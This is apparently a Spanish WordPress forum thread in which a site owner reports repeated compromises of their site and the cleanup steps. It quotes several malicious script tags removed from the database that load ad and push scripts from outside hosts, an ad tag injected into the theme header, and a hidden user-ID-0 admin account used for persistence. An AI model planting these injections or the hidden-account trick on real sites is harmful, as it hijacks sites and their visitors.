Hola.
Te dejo el enlace a la guía de seguridad de WordPress.org donde te indica cómo hacer un diagnóstico, también te dejo el enlace a la guía para limpiar un WordPress infectado/hackeado en español.
Coméntanos los resultados y, por favor, recuerda cerrar el debate marcándolo como resuelto cuando así lo consideres, de esta forma nos ayudas a mantener el foro al día.
Hola,
He limpiado archivos y reemplazado los q han tenido modificacion con Wordfence.
Actualizado todo, bloqueado los comentarios, eliminado manualmente archivos via FTP.
Tambien he cambiado contraseñas y nombre de base de datos y usuario de base de datos, contraseña de FTP, y acceso a panel de control.
Ademas he instalado hide login plugin, pero nada, esta madrugada ha vuelto a entrar.
De momento estoy instalando quttera para escanear con otro scanner, los scanners online me dicen que el sitio esta bien.
He contactado con Sucuri y que su plugin gratuito no da proteccion ni hace mucho, y que pague el plan de pago Pro y me solucionan el problema.
Investigo un poco mas por mi cuenta, y si no hay resultado, tocara apoquinar.
Actualizo.
Tras limpiar varias veces y no habia manera de proteger de los ataques, he optado por Malcare, 99$ al año.
Dejo aqui el reporte final.
File Report
DELETED
1. alfa-index.php
2. wp-content/ai1wm-backups/index.php
3. wp-content/uploads/siteground-optimizer-assets/externals/06d6cf01a3974f71e0283c9cc94dfdde.js
4. wp-content/uploads/siteground-optimizer-assets/siteground-optimizer-combined-js-aa6f6a1a1abe3880b8f6e0e9b296a484.js
QUARANTINED
1. wp-content.php
Database Report
Scripts Deleted from wp_options
1. <script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://iclickcdn.com/tag.min.js’,3440038,document.body||document.documentElement)</script>
2. <script src=»https://propu.sh/pfe/current/tag.min.js?z=3440045″ data-cfasync=»false» async></script>
3. <script type=»text/javascript» src=»//inpagepush.com/400/3440052″ data-cfasync=»false» async=»async»></script>
Estoy mirando a ver si vuelve a suceder, actualizo el hilo mañana a ver que pasa.
Actualizacion.
Despues de que se haya borrado con Malcare de pago, ha vuelto a suceder.
Esta vez ha pisoteado mi cuenta de admin con su contraseña, y en vez de utilizar header and footer injection, ha modificado directamente el header para que sea mas dificil de localizar y le quite los spams.
Este es el codigo oculto.
<script data-ad-client=»ca-pub-8556744503570466″ async src=»https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js»></script>
<meta charset=»<?php bloginfo( ‘charset’ ); ?>»>
<meta name=»viewport» content=»width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no»>
<link rel=»profile» href=»http://gmpg.org/xfn/11″>
<link rel=»pingback» href=»<?php bloginfo( ‘pingback_url’ ); ?>»>
Lloro.
Hola.
Tienes que seguir la guía paso a paso, sin saltarte ninguno.
Actualizo.
He tirado para restaurar una copia del mes de septiembre, y volcar algunos datos de base de datos actual que tenia.
Al hacer el volcado y comprobar en metadatas de usuarios, he visto que habia un usuario 0 con privilegios de admin.
No aparece en el listado de admin en el panel porque va desde 1, y este al ser id 0, creo que no aparece.
Ahi estaba la respuesta de como me pisoteaba un usuario de admin, por si fuera poco, no aparece tampoco en el intento de login de malcare.
En fin, reinstalacion de todo con la copia y a llorar.